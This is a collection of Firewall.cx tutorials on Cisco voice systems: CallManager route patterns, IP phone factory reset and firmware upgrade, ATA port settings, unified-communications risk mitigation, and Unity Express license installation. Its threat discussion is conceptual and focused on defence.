When selecting the H.323 Gateway, we need to provide a bit more information until it is usable by the system. 

In the field Device Name and Description, enter the IP address of the remote CME system, 192.168.20.1.

Next, click on the Device Pool field and select Default.  Finally cick on Save and Reset to have the changes take effect:

cisco-voice-cucm-cme-6

Configuring CallManager Route Group, Route List & Route Pattern

Our next step is to configure a Route Group, Route List and finally Route Pattern. This is a similar process to CME's dial-peer confguration but it's slightly more complicated in CallManager.

From the main menu, go to Call Routing > Route/Hunt > Route Group > Add New > Add Available Device and select the newly created H.323 Gateway. Click on Add To Route Group then click on save.

cisco cucm route group configuration

Now we go to Call Routing > Route/Hunt > Route List > Add New > Name, we used Route to 5xxx to help distinguish this route list. In the Cisco Unified Communication Manager Group drop-down option select Default then click on Save.

Right below we see the Route List Member Information section. Here we click on the Add Route Group button:

cisco-voice-cucm-cme-8

At the new screen select the Route Group field and choose WAN Devices-[NON-QSIG], then click on Save:

cisco-voice-cucm-cme-9

Finally we configure the Route Pattern. Go to Call Routing > Route/Hunt > Route Pattern > Add New > Route Pattern and enter 5XXX.  The pattern "5XXX" is similar to CallManager Express's "2..."  and will match any four digit number starting with 5.

Below, at the Gateway/Route List, select Route to 5xxx and uncheck Provide Outside Dial Tone. Finally, click on Save:

cisco cucm route pattern configuration

At this point CallManager has been configured to route all 5xxx extensions to the remote CallManager Express system and both systems should be able to communicate with each other.

About The Author

Mohammad Saeed is a guest writer on Firewall.cx,  freelancer and Video trainer, who loves working with Cisco techologies. As a CCNA & CCNP certified engineer, Mohammad works with small and medium size networking projects and helps students and network engineers to understand Cisco topics.

  • Hits: 143000

IP Phone 7945, 7965, 7975 Factory Reset Procedure, SCCP Firmware Upgrade & CME DHCP Server Setup

cisco-voice-ipphone-upgrade-01This article explains how to reset your Cisco 7945, 7965 and 7975 IP phone to factory defaults, and how to upgrade the firmware to the latest available version. We also provide necessary information on how to setup a DHCP server on a CME router or Cisco Catalyst switch, to support Cisco IP Phones and provide them with DHCP Option 150 so they know where to find and register with the CallManager or CallManager Express server.

According to Cisco, when initiating a factory reset procedure certain information from the IP phone is erased while other information is reset to the factory default value, as shown in the list below:

Information Erased:

  • CTL File (Certificate Trust List)
  • LSC File (Locally Significant Certificate)
  • IP Phone Call History (Calls Received, Placed, Missed etc)
  • Phone application

Information Reset to Default:

  • User configuration settings (ring tone, screen brightness, sound levels etc)
  • Network configuration settings

It is highly advisable to follow the firmware upgrade procedure in a non-working environment to ensure other phones are not affected (in case of an accidental reboot), and to avoid the freshly factory reset ip phones obtaining the working environment’s settings.

Cisco IP phone SCCP firmware files version 9.2.1 for 7945, 7965 & 7975 IP phones (latest version at the time of writing this article) are available at our Cisco IP Phone & ATA Firmware Download section. For our example, we used version 9.1.1.

Firewall.cx readers can visit our free Cisco IP Phone & ATA Firmware Download section to freely download the latest available firmware for their Cisco IP phones.

Things To Consider Before Factory Resetting Your Cisco IP Phone

When performing the factory reset procedure we are about to describe it is important to keep in mind that the IP phone will lose all configuration files and phone application. This means that it is necessary to have CallManager or CallManager Express setup so that the IP phone will be able to receive the new information (phone application and configuration) after the reset procedure is complete, because it is likely the IP phone will not be usable until this information is loaded.

This preparation also happens to be the procedure for upgrading a Cisco IP phone firmware.

Configuring CallManager Express (CME) For IP Phone Firmware Upgrade

Upgrading your Cisco IP phone firmware is a very simple process. Special consideration must be taken into account when upgrading to the latest firmware.

If the Cisco Unified IP phone is currently running firmware earlier than 6.0(2) on and you want to upgrade to 8.x(x), you must first install an intervening 7.0(x) load to prevent upgrade failure.

Cisco recommends using the most recent 7.0(3) load as the intervening load to avoid lengthy upgrade times.

If the Cisco Unified IP phone is currently running firmware 6.0(2) to 7.0(2) and you want to upgrade to 8.x(x), you can do so directly. However, expect the upgrade to take twice as long.

Step 1 – Download the Appropriate Firmware

To download Cisco IP Phone firmware a valid Cisco CCO account is required. In most cases, the firmware file name is something similar to the following:  cmterm-7945_7965-sccp.9-1-1.tar.  From the file name, we can understand that this is firmware version 9.1.1, for Cisco 7945 and 7965 SCCP IP phones.

Step 2 – Upload Firmware to CallManager Express

Next, the firmware must be uploaded and unpacked on our CME router. For this, we’ll need a TFTP server running on a workstation, plus access to the CME router.  From the CME prompt we instruct the router to download the firmware and unpack it onto our CME flash:

R1# archive tar /xtract tftp://10.0.0.10/cmterm-7945_7965-sccp.9-1-1.tar flash:
Loading cmterm-7945_7965-sccp.9-1-1.tar from 10.0.0.10 (via FastEthernet0/0): !
extracting apps45.9-1-1TH1-16.sbn (4639974 bytes)!!!!!!!!!!!!!!!!!!
extracting cnu45.9-1-1TH1-16.sbn (575590 bytes)!!
extracting cvm45sccp.9-1-1TH1-16.sbn (2211969 bytes)!!!!!!!!!
extracting dsp45.9-1-1TH1-16.sbn (356907 bytes)!
extracting jar45sccp.9-1-1TH1-16.sbn (1886651 bytes)!!!!!!!
extracting SCCP45.9-1-1S.loads (656 bytes)
extracting term45.default.loads (660 bytes)
extracting term65.default.loads (660 bytes)
[OK - 9680896 bytes]

When complete, the system’s flash will contain all 8 files extracted above.

Step 3 – Configure The CallManager Express TFTP server to serve these files & Setup DHCP Server (option 150)

Now we must configure CME’s tftp server to ‘serve’ these files so that the IP phones can request them.  This is done by adding the following commands to the router’s configuration:

R1(config)# tftp-server flash:apps45.9-1-1TH1-16.sbn
R1(config)# tftp-server flash: cnu45.9-1-1TH1-16.sbn
R1(config)# tftp-server flash: cvm45sccp.9-1-1TH1-16.sbn
R1(config)# tftp-server flash: dsp45.9-1-1TH1-16.sbn
R1(config)# tftp-server flash: jar45sccp.9-1-1TH1-16.sbn
R1(config)# tftp-server flash: SCCP45.9-1-1S.loads
R1(config)# tftp-server flash: term45.default.loads
R1(config)# tftp-server flash: term65.default.loads

We also need to ensure there is a valid DHCP server running with option 150 set to CME’s IP address. In our example, this is IP address 10.0.0.10. When the IP phone boots up, it will look for a DHCP server that will provide it with an IP address, but also expect to find DHCP option 150 which designates the CME the phone should try to register with:

ip dhcp excluded-address 10.0.0.1  10.0.0.15
!
ip dhcp pool Firewall.cx
 network 10.0.0.0 255.255.255.0
 dns-server  10.0.0.1 8.8.8.8
 default-router 10.0.0.1
 option 150 ip 10.0.0.10
!

The above configuration excludes IP address ranges 10.0.0.1 to 10.0.0.15 from being handed out by the DHCP server. It also creates a DHCP scope named Firewall.cx and configures various self-explanatory parameters including the critical DHCP option 150, which represents the CME the IP phone should try to register to.

Step 4 – Configure CallManager Express to use new Firmware on Next IP Phone Bootup

The final step involves configuring CME to use the new firmware and instruct IP phones to download it. This is done by issuing the following commands under the telephony-service section of CME:

R1(config)# telephony-service
R1(config-telephony)# load 7945 SCCP45.9-1-1S
R1(config-telephony)# create cnf
Creating CNF files...

The load command is followed by the phone type and associated firmware (.load) file. Notice we do not add the .loadof the filename at the end of the command.

The create cnf command instructs CME to recreate the XML files that will be used by the IP phone to download all necessary network parameters and force it to check its firmware and begin downloading the new one.

When our IP phone next reboots, it will download the latest firmware installed on the CME router and begin the upgrade process.

Performing the Factory Reset on Cisco 7945, 7965, 7975 IP Phone

Follow the steps below to successfully Factory reset your Cisco IP phone:

  1. Unplug the power cable from the ip phone and then plug it back in.
  2. While the phone is powering up, and before the Speaker button flashes on and off, press and hold the hash # key.
  3. Continue to hold # until each line button (right of the LCD screen) flashes on and off in sequence in orange colour.
  4. Now release the hash # key and type the following sequence 123456789*0#

After the sequence has been entered the line buttons on the phone flash orange, then green and the phone goes through the factory reset process. This process can take several minutes and the firmware of the IP Phone will be erased.

When complete, the IP phone will reboot and the bootloader will try to obtain an IP address via DHCP. The IP phone also expects the IP address (option 150) or the name (option 66) of the TFTP server to be delivered by the DHCP server. This is why these DHCP options are critical at this phase.

The phone then tries to obtain the appropriate termXX.default.loads file depending in its model:

  • term75.default.loads - Cisco 7975
  • term65.default.loads - Cisco 7965
  • term45.default.loads - Cisco 7945

This "loads" file indicates all the files the IP phone has to download from the TFTP server to make up the device firmware. The IP phone should first obtain the “loads” file and then proceed with the individual files. Once complete, the IP phone will install the files and finally reboot

Below is a screenshot of our 7945 IP phone during the firmware upgrade process:

cisco-ip-phone-7945-reset-1

The IP phone should now be ready for use with the new IP phone firmware installed.  The firmware can be verified by going to the phone Settings / Model Information menu option, where the load file installed is shown:

cisco-ip-phone-7945-reset-2

This article explained how to perform a factory reset for Cisco IP phones 7975, 7965 & 7945 models. We saw what information is lost during the reset, how to configure Cisco CallManager Express TFTP Server so that the updated SCCP firmware is automatically loaded on the IP phones and how to verify the IP phone firmware after the upgrade is complete.

  • Hits: 204782

How to Enable & Disable Phone Port Lines on Cisco ATA 186/188 for CallManager - CallManager Express

The Cisco ATA 186 and 188 analog phone adaptor is very common amongst Cisco CallManager (CUCM) & Cisco CallManager Express (CUCME) installations.

The ATA 186/188 provides two analog phone ports, allowing support for up to two analog phones and supports a number of features allowing an engineer to configure it according to the requirements and environment.

One neat feature is the ability to disable one of the two analog phone ports, something administrators might want to do if the second phone port is not used, providing an additional security measure.

On the other hand, a couple of second-hand ATA’s might fall into your hands and, upon testing, you may find out that only the phone port works – this doesn’t necessarily mean the second phone port is faulty!

When an ATA 186/188 registers on either CallManager or CallManager Express (CME), two MAC addresses appear in the device section.

Let’s take CME for example:

CME identify ATA 186 188 phone ports

When an ATA 186/188 is registered with CUCM or CUCME, the system will show two new MAC addresses. The first is the actual MAC address of the ATA device. This represents Phone Port No.1.

The second MAC address is similar to the first but with a ‘01’ appended at the end. The whole MAC address is then shifted to the left by two positions, as shown in the above screenshot. This second MAC address represents Phone Port No.2.

When a phone port is disabled, for example port Phone 2, the second MAC address ending in ‘01’ will not register anymore. If removed from the CUCM/CME system, it will not appear again until it is enabled.

How to Enable – Disable Cisco ATA Phone Port No.1 or No.2

The first step is to try resetting the ATA to its factory default setting. This is fully covered in our ATA 186/188 Upgrade and Factory Reset article.

In many cases a factory reset might not prove to be that useful, in which case manual configuration of the ATA parameter SID is required. To do this, open a web browser and connect to the ATA using its address e.g http://192.168.135.5. From the web interface, select SCCP Parameters under the Change Configuration menu option.

At the presented page, Phone 1 and Phone 2 ports at the back of the ATA are represented by the SID0 and SID1 field respectively.

To enable a port, simply enter a dot “.” as a parameter, or “0” to disable it. Simple as that!

The screenshot below helps make this practice clearer:

Cisco ata186 188 web gui

Of course, it is always highly recommended to upgrade to the latest ATA firmware version to ensure stability and enhanced functionality of the Cisco ATA 186/188 device. The latest Cisco ATA 186/188 firmware is freely available in our Cisco Download section.

  • Hits: 32373

Risk Management for Cisco Unified Communication Solutions - Countermeasures & Mitigation

As technology has advanced, things have become simpler yet more complex. One prime example is that of today’s communication networks. With the evolution of VoIP, the most obvious convergence is that of voice and data networks wherein both types of traffic leverage the same physical infrastructure, while retaining a possible logical network separation. While, this whole concept seems to be very exciting, there’s a big tradeoff in terms of security!

It’s unfortunate but true that, converged communication solutions are more often than not, deployed without much regard for the underlying security issues. In most cases, organizations tend to either ignore the security aspect of Unified Communication (UC) network’s security or underestimate the importance of the same. As a result a host of threats and attacks which used to be relevant to data networks now pester the voice implementation which leverages underlying data networks. Moreover, the existing security solutions which were designed for the data networks cannot adequately meet the new security challenges where voice meets data.

Unified Communications (UC) (Unified Communications is also referred to as IP Telephony) brings alongside a host of new security risks that cannot be resolved by existing security measures or solutions. While, UC risk mitigation strategies are just beginning to become known, UC threat mitigation entails significant costs or otherwise gets translated into cost of security that should be taken into account while designing the corporate UC security strategy. The first step to mitigate any risk is to know what your assets worth protecting are and what types of risks you should avert.

Let’s first understand the fundamentals of risk management.

UC Risk Management – Overview

Risk management is an art in itself as it spans multiple domains. Ideally, every asset in your UC network should be identified before going through risk management for your Cisco UC solution. This is important since it will identify what is most important to a business and where investment of time, manpower, and monetary resources will yield most favorable results. The assets that can be selected in a typical Cisco UC environment are (not limited to):

  1. Cisco Unified Communications Manager (CUCM)
  2. Cisco Unity Connection (CUC)
  3. Cisco Unified Presence Server (CUPS)
  4. Cisco Unified Communications Manager Express (CUCME)
  5. Cisco Unity Express (CUE)
  6. Cisco Voice Gateways
  7. Cisco Unified IP Phones (wired, wireless, softphones)
  8. Cisco Unified Border Element
  9. Cisco Catalyst Switches
  10. Cisco IOS Routers
  11. Cisco Adaptive Security Appliance (ASA)

Once the elements of your Cisco UC solution are identified, it’s time to give them their risk ratings, based on your risk appetite.

Let’s start by defining risk.

Risk – is defined as probability of something going wrong when conducting business as usual and has a negative impact.

Now, while you may know that your call-control - CUCM for example - is not secure and can be compromised, you are essentially bearing a risk that a known or an unknown threat may be realized leading to realization of the risk. In other words, you are setting up your risk appetite. Risk appetite may be classified into 3 major categories:

  • Risk aversion – Averting risks, adopting security where possible, high cost affair
  • Risk bearing – knowing that the network could be attacked, still bearing risk, least cost affair
  • Risk conforming – knowing that the network could be attacked, bearing risk to a minimal degree by implementing most critical security measures only, a balance between risk and cost

Next comes the risk rating, i.e. how you wish to rate the criticality of an element of Cisco UC solution to the operations of your network. For example, if CUCM is under attack, what will be the impact of the same on your network? Or, if an edge router is attacked, how do you expect the communication channels to be impacted?

Each application, device and endpoint should be given a risk rating which can be low, moderate or high. The Figure below depicts risk impact vs. likelihood.

Risk Impact vs. Likelihood (ratings)

uc-risk-management-1Let’s now understand the threats that lurk around your UC solution and could possibly prove detrimental to the operations of a UC network.

The Risks & The Threats

There’s always bad guys out there waiting to impart damage to your UC infrastructure for their financial benefit, to prove their superiority to other hackers or just for fun’s sake.

The table below gives an overview of various threats and the possibility of these threats maturing i.e. risk realization as well as the probable impact on an organization’s operations. Please note that these are the most commonly seen threats:

Threat Type

Risk of Impact

   

Confidentiality

Leakage of sensitive information (eavesdropping)

Identity theft (Spoofing)

   

Integrity

Identity theft (Spoofing)

Compromised Information (Malformed packets, packet injection)

   

Availability

Service Outages (DOS, DDOS, SPIT)

Lost Productivity (Bandwidth Depletion)

   

Service Theft

Excessive phone bills (Toll Fraud)

Espionage (Call Hijacking)

 Let’s pay a closer visit to these threats and their risk bearings.

Eavesdropping – gives the attacker the ability to listen and record private phone conversation(s). An attacker can eavesdrop on VoIP conversations by disconnecting a VoIP phone from the wall outlet and plugging in a laptop with a softphone or packet capture software (such as Wire Shark) or by virtue of VLAN hopping attacks. Additionally, eavesdropping can be implemented using SIP proxy impersonation or registration hijacking. If this threat is realized, the risk of damage or disruption is high.

Identity Theft – Can happen at various OSI layers right from layer 2 through layer 7. Some examples are: MAC spoofing; IP spoofing; call-control / proxy / TFTP spoofing. There are freely available tools such as macmakeup, nemesis and so on which can help the attacker spoof an identity, in other words perform identity theft to trick the source or destination in a voice conversation to believe it is communicating with a legitimate person whilst it’s the attacker playing on behalf of a legitimate source. Now, a typical example of such an attack is when an attacker can spoof the MAC address of a victim’s machine and register his softphone. The attacker has the privilege equivalent to that of the victim and can conduct toll-fraud (explained later in this article) or extract information from the softphone’s web server to launch a flurry of attacks on the voice infrastructure. If this threat is realized, the risk of damage or disruption is moderate to high (depending on the privilege the attacker gains based of the victim’s profile).

Compromised Information / Loss of Information: Every business has some confidential information which, if exposed to its competitor or leaked on the internet, can prove detrimental for the business. Moreover, incorrect information passed to a destination entity can result in the business running into issues. An attacker can compromise the information in voice calls by injecting malformed packets, modifying the RTP packets, or by eavesdropping the call (discussed earlier). Packet injection or malformation attacks are difficult to detect unless an integrity method / algorithm is implemented. If this threat is realized, the risk of impact is high.

Toll fraud – This has been a classic issue since PBX days and continues to be a real nuisance in the VoIP world. An attacker finds a way to place an external call to the victim’s call-control and “hairpin” it into an outgoing call to an external destination. This could be performed using DISA, via voicemail, by a compromised IP Phone (such as a softphone), or by simply having an insider forward the calls to a desired international destination. This attack can land an organization with a skyrocketing bill in no time. The threat level of risk is high.

Denial of service – A DOS attack prevents use of the corporate UC systems, causing loss of business and productivity. An attacker can initiate a war dialer, remote dialing, or manually initiate an attack by launching multiple calls against a system.  This in turn overloads the system on call-control and depletes the bandwidth. The effect can range from legit users getting the busy tone when trying to dial any number, using voice mail or IVR to system bandwidth being filled by unwanted traffic. Level of risk for this type of threat is medium.

Spam over IP Telephony (SPIT) – equivalent to email spam on data networks. It’s unsolicited and unwanted bulk messages sent / broadcast to an enterprise network’s end‐users. This causes the enterprise user’s voicemail box to be full and the endpoint to be busy with unwanted calls. These high‐volume bulk calls are very difficult to trace and inherently cause fraud and privacy violations.

Call Hijacking – UC endpoints / devices can be hijacked through a variety of hacking techniques, such as registration hijacking and call redirection. Rogue endpoints can enable a hacker to use the organization’s communication systems without authenticating to the call-control. This can lead to toll fraud and disrupt communications. Also, rogue endpoints or wireless access controllers (WLC) or wireless access points (WAP) can serve as a back door for attackers to gain entry to legitimate network zones and compromise call-control, voice messaging, presence, and other services. Level of risk for this type of threat is medium to high.

Mitigating Risks

A golden saying in the world of security is – Security is only as strongest as the weakest link!

To ensure that your Cisco UC network is secure and can deter most threats while reducing the associated risks, a multi-level security construct is required. In other words, no single security solution can restrain all threats or risks; security at multiple levels within a network i.e. at endpoint, server, application, network, perimeter, and device level helps avert a host of threats.

It’s important to treat the development of a UC risk management program as a collaborative cross‐organizational project. Any actionable risk assessment needs: a comprehensive list of threats; feasibility of realization of each threat; a prioritization of mitigation actions for each of the potential threats. It’s most important that risks be managed and mitigated in line with corporate vision and continuity of essential operations when deploying UC systems.

Following are the leading practice recommendations to mitigate risks pertinent to various threats in a Cisco UC network:

  • Implement adequate physical security to restrict access to VoIP components; Voice and Data traffic segregation at VLAN level and, if possible, at firewall zone level.
  • Implement VoIP enabled firewall (application layer gateway) e.g. Cisco ASA.
  • If voice VLAN is propagated to a remote location, implement firewall zoning to separate inside from outside traffic.
  • Disable unused switch ports.
  • Implement DHCP snooping, Dynamic ARP Inspection (DAI), and port security features on Cisco Catalyst switches.
  • IP Phones located in public areas such as lobby, elevator, or hotel rooms, must be separated from employee/internal network by firewalls and ideally should have their own dedicated VLAN.
  • Implement 802.1x based network access control (NAC) using EAP-TLS where possible.
  • Implement scavenger QoS class for P2P and other unwanted traffic.
  • Secure telephony signaling using TLS and media SRTP (Cisco CAPF).
  • Encrypt signaling and media traffic for endpoints, gateways, trunks, and other ecosystem applications where possible.
  • Establish dedicated IDS for voice VLAN for traffic within campus and from remote sites (SPAN, RSPAN)
  • Secure voice messaging ports.
  • Utilize Cisco Malicious Call Identification (MCID) to tag and list malicious calls.
  • Implement a call accounting/reporting system such as CAR or third party billing software to view call activity on an ongoing basis.
  • Implement strong password and PIN policies as well as OTP policies.
  • Use the SSO available in Cisco UC applications to suppress fraudulent admission to network.
  • Configure off-hours calling policies in line with the organization’s policies.
  • Configure administrative group privilege restriction levels.
  • Disable PSTN to PSTN trunk transfer.
  • Enable ad-hoc conferencing conclusion on exit of the initiator.
  • Harden IP Phones by disabling unused features and restricting settings access.
  • Sporadically review system usage reports for abnormal traffic patterns or destinations.
  • Use VPN to provide a secure conduit for communication with telecommuters/remote workers. V3PN, available in Cisco IOS routers and security appliances, enables encryption of voice, video, and data traffic using IPSec. SSL VPN can also be used from VPN Phones and SSL VPN client on PC’s with softphone.
  • Enforce Antivirus (on Windows based servers) and Host Intrusion Prevention System (HIPS) on Windows and Linux based servers.
  • The human factor cannot be ignored. Hence, train people in your organization about their responsibility for executing enterprise risk management in accordance with established directives and protocols.

Summary

In a nutshell, there is no one-size-fits-all when it comes to securing a Cisco UC network. No two networks are alike and organizations must examine UC security from a business perspective by defining their vision, goals, policies, and patterns of usage. It’s important that the security implemented is aligned with and in compliance with applicable laws and regulations, while being effective against business risks.

Moreover, a change in risk appetite must be observed when an organization’s priorities or business processes change. A multitude of the UC security risks can be resolved by applying existing ad-hoc security measures and solutions in a planned manner as listed in previous sections. The risk management solution approach is based on evaluating the following factors in order to minimize costs and maximize mitigation of risks:

  • Business Impact of realization of a risk
  • Compliance requirements
  • Threat surface
  • Budgetary constraints

This schema is depicted in the below figure:

Risk Management Specifics for Cisco UC

Cisco unified communications risk management

A successful UC risk management system or construct will ideally address all threats from realizing while minimizing business impact in compliance with laws and regulations, and is within budget such that the Total Cost of Ownership (TCO) decreases with time while Return on Investment (ROI) increases.

About The Author

Akhil Behl is a Senior Network Consultant with Cisco Advanced Services, focusing on Cisco Collaboration and Security architectures. He leads Collaboration and Security projects worldwide for Cisco Services and the Collaborative Professional Services (CPS) portfolio for the commercial segment. Prior to his current role, he spent 10 years working in various roles at Linksys, Cisco TAC, and Cisco AS. He holds CCIE (Voice and Security), PMP, ITIL, VMware VCP, and MCP certifications.

He has several research papers published to his credit in international journals including IEEE Xplore.

He is a prolific speaker and has contributed at prominent industry forums such as Interop, Enterprise Connect, Cloud Connect, Cloud Summit, Cisco SecCon, IT Expo, and Cisco Networkers. Akhil is also the author of Cisco Press title ‘Securing Cisco IP Telephony Networks’.

Read our exclusive interview of Akhil Behl and discover Akhil's troubleshooting techniques, guidelines in designing and securing VoIP networks, advantages and disadvantages of Cisco VoIP Telephony and much more: Interview: Akhil Behl Double CCIE (Voice & Security) #19564.

 

  • Hits: 32818

Unity Express License Setup & Installation - Software Activation

Unity Express provides any organization with a quick and convenient way to manage voicemail, auto attendant and interactive voice response (IVR) services.  These services are provided within the Unity Express module.

When purchased, Unity Express includes a few licenses for some services, such as voice ports for auto attendant, while other services like mailboxes are not included.  This policy forces companies requiring these services to purchase additional licenses from Cisco in order to activate or expand the system’s capacity.

A good example is the Unity Express voice mailbox service. When purchasing Unity Express, by default it does not include any mailboxes. 

While the Unity Express web interface allows the creation of voice mailboxes despite the fact no licenses are installed, you won’t be able to make use of them unless the appropriate number of licenses is installed.

When a caller is redirected to a user’s voice mailbox where the system does not have the necessary licenses installed, instead of hearing the called party’s voicemail prompting to leave a message, the following prompt is heard:

Voice mail system is unavailable, try again later, to talk to the operator, press zero.

Engineers and Administrators interested can read our popular articles covering the physical installation and initial setup of Unity Express on Cisco CallManager Express or Cisco Voice Gateways:

Installing & Verifying Unity Express Licenses – 4 Simple Steps

Installing Unity Express licenses is not all that complicated. We’ve broken down the process into four simple steps to make it as clear and simple as possible:

  • Registering and Assigning your Product Authorization Key (PAK) number
  • Obtaining the Correct UDI Product ID and Serial Number
  • Installing the Software License on Unity Express
  • Verifying Unity Express License Installation

No matter what type of license you have the installation process is the same. It is important to note that when installing multiple PAKs for a service they must be combined into a single license. For example, if you have purchased four packs of 5-user-mailbox licenses to support a total of 20 users, you must ensure these are combined into a single 20 mailbox license file and not four x 5-mailbox license files. If problems arise, Cisco support is always available to help resolve any licensing problem.

Before we begin the license installation process it is important to verify the existing licenses so we are sure of what we have already.

Verifying Existing Cisco Unity Express Licenses

Before considering purchasing licenses it is necessary to verify what is already installed. This is easily done by using the following command to view the currently installed licenses. Note that the License Type: Permanent from the command output is what we are looking for. This represents a permanent license, which is also the installed licenses:

2911-UnityExpress#  show license all
License Store: Primary License Storage
StoreIndex:  0  Feature: VMIVR-PORT                        Version: 1.0
        License Type: Permanent
        License State: Active, In Use
        License Count: 2 /2
        License Priority: Medium
License Store: Evaluation License Storage
StoreIndex:  0  Feature: VMIVR-VM-MBX                      Version: 1.0
        License Type: Evaluation
        License State: Active, Not in Use, EULA accepted
            Evaluation total period:  8 weeks  4 days
            Evaluation period left:  0 minute   0 second 
        License Count: 600 / 0
        License Priority: Low
License Store: Evaluation License Storage

Note: We’ve removed the rest of the command output to avoid redundant information.

License Type: Evaluation is, as the output indicates, evaluation licenses. These are not installed/purchased licenses and normally are limited to a 60 day trial period after which they expire and are disabled.

Another way to verify the installed licenses is to log into the Unity Express GUI interface and visit the Administration>Licenses section:

Cisco Unity Express license summary

As both CLI output and GUI interface confirm, we currently have two VMIVR-PORT licenses installed. This license feature will allow up to two simultaneous calls to the autoattendant system or user voice mailbox service.

Register & Assign Your Cisco Product Authorization Key (PAK) Number

When purchasing a Unity Express license, you’ll receive it either as a hardcopy or electronically delivered license. The license contains an 11-digit Product Authorization Key number, also known as PAK. The PAK is basically your license, which needs to be associated with your Unity Express hardware. This process is done through the Cisco.com website. Once associated, the necessary license file will be delivered to you electronically and you’ll then need to install it on Unity Express.

To begin registration, visit  http://www.cisco.com/go/license.  A valid CCO account is required, so users without a CCO account will be required to register first. After the logon process is complete, we need to enter our 11-digit PAK number as shown in the screenshot below:

If more than one license PAK has been purchased for the same family product, for example 2 packs of 5-user mailbox license, then click on the Load More PAKs button and the page will provide additional fields to enter all purchased PAKs.

Since our example only contains a single PAK, we enter it and then click on Fulfil Single PAK.

The next page allows us to assign our PAK to our Unity Express hardware. Click the Quantity Available check-box to ensure all quantities are selected (one in our case) and below enter the UDI Product ID and Serial Number.

cisco unity express PAK number

Note: The small arrow box on the right of the UDI Product ID field (shown in the screenshot below) will produce a pop-up window instructing to issue the “Show License UDI” CLI command in Unity Express, to obtain the correct Product ID and Serial Number, however, the information provided by the CLI prompt is misleading and can cause confusion.

Cisco Unity Express License Pak & serial number

 The next section covers how to obtain the correct UDI Product ID and Serial Number.

Obtaining The Correct UDI Product ID & Serial Number

From your router prompt, connect to the Unity Express CLI prompt and issue the show license udi command:

2911-CCME# service-module ism 0/0 session
Trying 192.168.10.5, 2131 ... Open
2911-UnityExpress#
2911-UnityExpress# show license udi
Device#    PID           SN              UDI
----------------------------------------------------------------
*0      ISM-SRE-300-K9  FOC162427RV   ISM-SRE-300-K9:FOC162427RV

Note that, under the UDI column, the system shows ISM-SRE-300-K9:FOC162427RV – this is actually the UDI and serial number  (UDI:SERIAL_Number).  The UDI is everything before the semicolon (:).

So, UDI is ISM-SRE-300-K9 and the system serial number is FOC162427RV. If ISM-SRE-300-K9:FOC162427RV is entered in the UDI Product ID field, the system will not accept it.

Cisco does not mention how to distinguish the correct UDI from the output provided, this can cause frustration when trying to assign the PAK to the hardware.

Even the show version provides the same confusing result. Notice the UDI section:

2911-UnityExpress# show version
2911-UnityExpress uptime is 0 weeks, 0 days, 17 hours, 23 minutes
CPU Model:           Genuine Intel(R) processor   1.06GHz
CPU Speed (MHz):     1066.774
CPU Cache (KByte):   64
BogoMIPS:            2134.79
SKU:                 ISM-SRE-300-K9
UDI:                 ISM-SRE-300-K9:FOC162427RV
Chassis Type:        C2911
Chassis Serial:      FCZ262120AD
Module Type:         ISM
Module Serial:       FOC162427RV
Compact Flash:       4110MB
SDRAM (MByte):       512

Register & Assign Your Product Authorization Key (PAK) Number (continued)

After entering the UDI Product ID and Serial Number in the provided fields, press the Assign button to assign the PAK to the Unity Express hardware. The page will update and show Device, PAK and SKU assignment:

cisco-voice-ue-license-5

We are now ready to continue by clicking on the Next button.

The system now presents us with the final page where we enter our email address and confirm the end user. We must agree to the License terms before the license can be generated. When ready, click on the Get License button:

cisco-voice-ue-license-6

 

A pop up window confirms the license is being processed and will be emailed when complete. This takes a couple of seconds. There is also an option to download the license directly in case access to email is not possible:

cisco-voice-ue-license-7

A final confirmation window tells us the license is ready for download and has also been emailed to our registered address:

Cisco unity express license delivery

The license file name is somewhat long and contains the system’s serial number and a 17 digit number.

Installing The Software License On Unity Express

Unity Express licenses are installed via an FTP server. The FTP server will serve the license file and we’ll instruct Unity Express to fetch the license using the CLI prompt.

We assume an FTP server is up and running on a workstation and is accessible from Unity Express.

Now we need to log into Unity Express and issue the command so it can fetch the license and install it.

Note the command syntax is ftp://username:password@ftp_server_ip/licensefilename:

2911-CCME# service-module ism 0/0 session
Trying 192.168.10.5, 2131 ... Open
2911-UnityExpress#

2911-UnityExpress# license install ftp://admin:This email address is being protected from spambots. You need JavaScript enabled to view it./FOC162427RV_20121026011249726.lic
Installing...Feature:VMIVR-VM-MBX...Successful:No Error
License Note:
Application will evaluate this change upon next reload
1/1 licenses were successfully installed
0/1 licenses were existing licenses
0/1 licenses were failed to install

2911-UnityExpress# reload
Reloading the system will terminate all end user sessions.
Doing a reload will cause any unsaved configuration data to be lost.
Are you sure you want to reload? [confirm]
2911-UnityExpress#

MONITOR SHUTDOWN...

Verify Unity Express License Installation

Upon reboot, Unity Express will enable the newly installed license and it will be available for use. When the reboot completes, we can verify the license status using the show license status application command.

To make things a bit more interesting we created 10 voice mailboxes while installing a 5 user mailbox license. This means we had more mailboxes than our installed license allowed. Check out the result:

2911-UnityExpress# show license status application
voicemail disabled, installed mailbox quantity (10) exceeds licensed count (5)
ivr disabled, no activated ivr session license available

When dialing a user’s extension where voicemail was enabled, as explained earlier, instead of the standard greeting message we got the Cisco lady telling us : Voice mail system is unavailable, try again later, to talk to the operator, press zero.

After deleting the 5 additional mailboxes and issuing the show license status application command, we notice the voicemail service is now enabled:

2911-UnityExpress# show license status application
voicemail enabled: 2 ports, 2 sessions, 5 mailboxes
ivr disabled, no activated ivr session license available

Useful Unity Express License Show Commands

Following is a collection of useful commands that provide information on Unity Express’s license condition:

'show license status application'

The show license status application command displays the status of the license applications installed in Unity Express. The command accepts additional parameters such as: ivr, ports, timecardview, voicemail. By entering the command as shown, it will display information for all applications:

 2911-UnityExpress# show license status application
voicemail enabled: 2 ports, 2 sessions, 5 mailboxes
ivr disabled, no activated ivr session license available

'show license all'

The show license all command displays the summary of all the licenses installed in your Unity Express system. The command has no additional parameters:

2911-UnityExpress# show license all
License Store: Primary License Storage
StoreIndex:  0  Feature: VMIVR-PORT      Version: 1.0
        License Type: Permanent
        License State: Active, In Use
        License Count: 2 /2
        License Priority: Medium
License Store: Primary License Storage
StoreIndex:  1  Feature: VMIVR-VM-MBX    Version: 1.0
        License Type: Permanent
        License State: Active, In Use
        License Count: 5 /5
        License Priority: Medium
License Store: Evaluation License Storage
StoreIndex:  0  Feature: VMIVR-VM-MBX    Version: 1.0
        License Type: Evaluation
        License State: Inactive
            Evaluation total period:  8 weeks  4 days
            Evaluation period left:  0 minute   0 second 
        License Count: 600 / 0
        License Priority: Low
License Store: Evaluation License Storage
StoreIndex:  1  Feature: VMIVR-PORT      Version: 1.0
        License Type: Evaluation
        License State: Inactive
